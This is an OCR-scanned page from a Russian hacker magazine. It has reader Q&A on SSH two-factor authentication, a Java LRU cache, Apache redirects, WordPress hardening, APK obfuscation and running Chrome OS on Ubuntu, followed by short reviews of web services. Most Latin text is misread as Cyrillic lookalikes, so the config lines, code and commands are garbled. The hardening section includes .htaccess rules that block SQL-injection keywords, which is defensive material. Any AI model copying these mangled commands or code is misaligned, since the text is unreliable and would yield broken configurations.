5іер 3: 5еі уоиг 

Ггапз^ег орііопз апсі 
до! 



Дружественный интерфейс сервиса Васкир Вох 



Теперь нужно добавить новую учетку 
в боодіе АиіНепІісаІог на твоем мо- 
бильном девайсе. Для этого в меню 
боодіе Аиібепіісаіог на телефоне выбери 
«Добавить учетную запись». Теперь можешь 
выбрать «Добавить учетную запись вручную» 
и ввести 16-значный ключ, сгенерирован- 
ный на предыдущем шаге, или же выбрать 
«Сканировать штрих-код». Соответствующий 
штрих-код можно увидеть по ссылке немного 
выше ключа. Кроме того, псевдографический 
ОВ-код будет напечатан прямо в терминале, 
просто увеличь размеры терминала, если 
он там не помещается. 



Чтобы прикрутить все это к 55Н- 
авторизации, открой из-под рута 
файл /еІс/рат.сі/55Ьсі и добавь в конец 
следующую строчку: 

аиТЬ гециігесі раш_§оо§1е_аи1:Ьеп1:іса-1:ог. $о 

А в конфиге /есІ/з5Ь/5зЬ(і_сопІід смени значе- 
ния ключа на уез: 

СЬаІІепееРезропзеАиІіЬеп-ІіісаІіоп уез 

Ну и наконец, для внесения изменений пере- 
загрузи 55Н-сервер («зегѵісе ззЬ гезіагі»). 



На этом настройка завершена. Твой 
Б5Н защищен двухэтапной аутентифи- 
кацией. Чтобы проверить это, попро- 
буй залогиниться на свой 55Н-сервер: после 
ввода пароля увидишь запрос на ввод времен- 
ного ключа. Если ввести ключ неправильно, 
то откинет обратно на ввод пароля. Как ты смог 
убедиться, боодіе АиіЬепІісаІог позволяет 
очень легко и в считаные минуты прикрутить 
двухфакторную авторизацию к чему-либо, 
в нашем случае — к 55Н. 
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Простейший І_ВІІ-хеш можно создать 
на основе )аѵа.игіШпкесЛНа5ЬМар: 

Япаі іпИ МАХ_5І2Е = 1500; 

МарсК, Ѵ> ІгиСасЬе = 

пем ИпкесІНазЬМарсК, Ѵ>(МАХ_5І2Е, - 

0. 75-Р, 1гие){ 

@ОѵеггісІе 

рго1:ес*ес1 Ьооіеап гетоѵеЕІгіезІЕп-СгуС 
Мар.Еп1гу<К, Ѵ> еісіез-і:) { 
геіигп 5І2е() > МАХ_САРАСІТѴ; 

} 

и 

Метод гетоѵеЕИезіЕпІгу вызывается 
на каждой вставке, и, если он возвращает 
Ігие, элемент в хвосте удаляется. А так как мы 
передали в третьем параметре конструктора 
Ігие, то запрашиваемый элемент будет ав- 
томатически перемещаться в начало очере- 
ди, —такой вот простейший 1_ВІІ-кеш. Если 
же нужен кеш поэффективнее, то рекомендую 
взглянуть на разработку инженера боодіе 
СопсиггепІІ_іпке(іНа5ЬМар ( ЬіІ.Іѵ/ІЬазЬтар ). 

Как запретить вход на мой сайт через 
НИР, перенаправляя всех пользовате- 
лей на НТТР5? И еще вопросик: как отправ- 
лять мобильных пользователей на мобильную 
версию сайта (допустим, тоЬіІе.зіІе.сот)? 

Для этого воспользуйся ВОЗМОЖНОСТЯМИ 
тос!_геѵѵгіІе. Добавь в Массезз-файл 
следующие строки: 

КемгіТеЕп§іпе Оп 
КемгіТеСопсІ %{НТТР5} !=оп 
КемгіТеКиІе .* ЫТрз :// ѵіѵм . $іТе. сот/*-< 
%{ке(2ііе5т_іш} [кд] 

В случае если хочешь переадресовывать, 
не используя ѵѵѵѵѵѵ, тогда правило будет таким: 

# КемгіТеРиІе .* ІтСТрз ://5іТе. сот/*-' 
%{КЕ<2иЕ5Т_ШІ} [К,Ь] 

Решение для мобильных пользователей 
выглядит так: 

РеыгіТеСопсІ %{НТТР_и5ЕК_АСЕМТ} ^ 

"апсігоісі | ЫаскЬеггу | §оо§1еЬоТ -тоЫІе 
іетоЬИе | ірасі | ірЬопе | іросі | орега тоЬіІе | -< 
раітоз |иеЬоз" [NС] 

КемгіТеКиІе л $ ЫТрз : //тоЬіІе. БІТе. сот/^-> 

[ Ь, Р=302] 

Можешь подсказать, как усилить 
безопасность блога на М>ггіРгез5'е? 

Думаю, читателю журнала «Хакер» 
не стоит давать очевидных рекоменда- 
ций типа использовать сложные пароли, 
постоянно накатывать обновления и тому 
подобных. Поэтому предложу несколько 
нетривиальных советов: 

1. Измени стандартный префикс, который 
ѴѴогсІРгезз автоматически добавляет к на- 
званиямтаблицв БД, на какой-тосвой. 




Двухэтапная авторизация в действии 

2. Спрячьотпользователя версию 
ѴѴогсіРгезз'а: для этого в файл (ипсІіопз.рЬр 
темы добавь: 

гетоѵе_асТіоп( 'ир_ЬеасІег ’ , ^ 
'мр^епегаТог' ); 

3. Установи зесигііу-плагины, напримерТАС 
(ЫЦу/уудііас) или Ве»ег\А/Р5есигіІѵ( Ьіиѵ/ 

ѵѵр-зес ). 

4. Фильтруй потенциальноопасныезапро- 
сы. Для этого добавь в Массезз, например, 
такие строки: 

РеыгіИеСопа %{(2иЕКѴ_5ТК™с} ^ 

А . * (%22 | %27 | %ЗС | . . . ) . * [МС,ОР] 



Ремгі-СеСопсІ %{<ЭиЕРѴ_5ТКІМС> - 
л .*(зе1есС|ипіоп|сІгор| ...).* [N0] 
Ремгі1:еКи1е л (.*)$ - [Р,І_] 

5. Закройдоступ кдиректориисплагинами 
зііе.сот/ѵѵр-сопіепі/ріидіпз/ — можешь 
через Массезз, а можешь закинуть в эту 
директорию пустой іпсіех.МтІ. 

Как защитить АРК 
от декомпиляции? 

Апсігоісі-программа — это та же Эаѵа- 
программа, поэтому способы защиты 
аналогичные. Полностью защитить твою 
программу от декомпиляции невозможно: 
независимо от защиты специалист все равно 
сможет достать то, что ему нужно. Но можно 
усложнить декомпиляцию, превратив ее 
в длинный и ужасный процесс. Для этого 
можно: 

1. Пропустить программу через разного рода 
обфускаторы (РгоОиагсІ, например), которые 
сделают нечитабельной декомпилирован- 
ную программу. Также можно запутать код 
вручную. 

2. Зашифровать ресурсы (картинки, текст). 

3. Перенести самые важные модули в библио- 
теки С++— декомпиляция бинарника в разы 
сложнее, чем Эаѵа-байт-кода. 

4. Перенести основную логику в)пі, кроме это- 
го, нужно перенеституда проверку подписи 
АРК. 



5. Подгружать ключевые алгоритмы с сервера 

в виде скриптов. 

Это позволит лишь усложнить жизнь взлом- 
щику или отсеять непрофессионалов. А если 
твой код ну уж очень ценный, то лучшей его 
защитой будет патент :). 

Давно хочу попробовать СЬготе 05. 
Конечно, покупка СЬготеЬоок'а 
как вариант не рассматривается. Пробовал 
скачивать отдельный Ііѵе-дистрибутив, 
но на моем железе он не работает. 

Что посоветуешь? 

Действительно, список поддерживаемо- 
го СЬготе 05 железа весьма ограничен. 
Но практически на любом железе работает 
ІІЬиМи. При чем здесь ІІЬиМи? Дело в том, 
что в рамках проекта ІідМсІт-Іодіп-сЬготіитоз 
( ЬІІ.Іѵ/исЬготе-оз ) разработан пакет, который 
позволяет запустить пользовательское 
окружение СЬготе ОБ поверх ІІЬиМи. Чтобы 
установить пакет, просто выполни следующие 
команды: 

$ ы§еТ ЫТр://ЫТ.1у/ТЬ-РТМТ 
$ зисіо сІрк§ -і *-< 

1ііЬТсІт-1о§іп-сЬготіито5_1.0_атс164.с1еЬ 

Существует два режима запуска: внутри 
окна в текущем окружении (для чего ис- 
пользуется оконный менеджер Лига), а также 
полноценный пользовательский сеанс. Чтобы 
запустить СЬготе 05 внутри окна, нужно вы- 
полнить: 

$ сЬготеоз 

Для входа же в сеанс нужно выбрать 
СЬготшт 05 в приглашении дисплейного 
менеджера. Внутри СЬготе 05 работает 
РІазЬ, .Лаѵа, присутствует боодіе Таік плагин. 
Кроме того, поддерживается хардварная 
акселерация видео. К сожалению, на дан- 
ный момент не работает захват изображений 
с веб-камеры, разные системные настройки, 
как, например, контроль громкости, — эти на- 
стройки игнорируются. 

Полноценно пользоваться проектом на дан- 
ном этапе его развития нецелесообразно, 
но для ознакомления — в самый раз. зс 




СЬготе 05 поверх КиЬипІи в оконном режиме 
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ІІЫІТ5/ѴѴѴѴѴѴ2 



ѴѴѴѴѴѴ2 



РУБИВІІИЕТ 



ризНЬиІІеІ.согп 

Обмен файлами, ссылками и другими материалами между компьютером и мобильным 
устройством достаточно геморройная процедура. В худшем случае это решается пере- 
сылкой самому себе по почте (как, например, делаю это я), в лучшем — через ОгорЬох. 
Сервис РизЬВиІІеІ решает эту задачу с помощью простого веб-приложения и клиен - 
та для АпсігоісІ. Через веб-интерфейс на устройство можно послать ссылку, адрес, 
список или же файл. При этом приложение красиво использует систему оповещений 
Апгігоісі 4 — списки можно просмотреть прямо в этой панели. У сервиса существует рас- 
Удобный способ обмена файлами и заметками между ширение для браузера боодіе СЬготе. Не хватает возможности двустороннего обмена, 

смартфоном и компьютером что позволило бы послать со смартфона, например, фото. 



РизПіпд Іо: 

Затзипд Саіаху №хи5 

ывт ***•» іш т и* 

Зеіесі а те М12-і2-іб-ѵуЛемуча$рЬйп.2ір 



рЛго 




Сервис, позволяющий быстро получитьскриншот-«колбасу» 
длинной веб-страницы 



5МАРІТ0! 



зпарііо.сот 

В веб-дизайне часто применяют метафору айсберга: то, что не попадает на первый 
экран браузера (верхушка), большинство пользователей рискуют никогда не увидеть. 
Тем не менее есть множество ситуаций, когда уложиться в один экран невозмож- 
но, — например сайты СМИ, блоги и другие проекты, завязанные на больших объ- 
емах контента. При анализе структуры таких страниц возникает очевидная проблема 
со скриншотами, которую приходится решать топорным способом: делаешь отдельные 
скриншоты, а потом склеиваешь. Бпарііо! помогает справиться с этой проблемой, делая 
полный скриншот страницы. К сожалению, в некоторых случаях сервис работает не 
слишком надежно. Например, есть проблемы с динамически подгружаемой статикой. 









Простейший букмарклет, позволяющий быстро посмотреть 
нато, как сайт будет отображаться в браузере іРЬопе и іРагі 



РЕБРОИБІѴЕ РЕБІбЫ В00КМАВК1_ЕТ 



гезропзіѵе.ѵісіогсоиіоп.іг 

Об отзывчивой верстке много было написано в январском номере ][ (статья «Швей- 
царский нож для III») — рекомендую ознакомиться, если ты еще не понял, насколько 
это важно. А для реальной работы советую не ресайзить окно браузера «на глазок», 
а использовать простой, но очень удобный букмарклет, позволяющий быстро оценить, 
как будет выглядеть страница в окне браузера іРЬопе или іРасі (можно задать собствен- 
ное разрешение экрана). Можно сымитировать клавиатуру іОБ и посмотреть, отъест ли 
она важный кусок страницы. Естественно, доступны как портретный режим, так и аль- 
бомный. При тестировании собственных страництакже удобна опция синхронизации 
С55, позволяющая в реальном времени отражать внесенные изменения. 



5НАРЕСАТСНЕВ 



зНаресаІсЬег.сот 



При верстке часто приходится долго и мучительно искать юникодные обозначения 
для нестандартных символов: математические обозначения, буквы греческого ал- 
фавита и многое другое. Обычное решение этой проблемы — вбить в поиск название 
символа. Но куда более удобное решение предлагает сервис зЬаресаІсЬег. С помощью 
этой тулзы можно просто нарисовать символ, а сервис его сам распознает и назовет 
соответствующий символ в юникоде. Понятно, что аккуратно нарисовать символ с по- 
мощью мышки или тачпада непросто, поэтому сервис выдает сразу список возможных 
вариантов. Как хвастается создатель на главной странице, в базе сервиса находится 
Сервис, позволяющийискатьсимволыііпісогіепорисунку ПОЧТИ 12 ТЫСЯЧ СИМВОЛОВ. 
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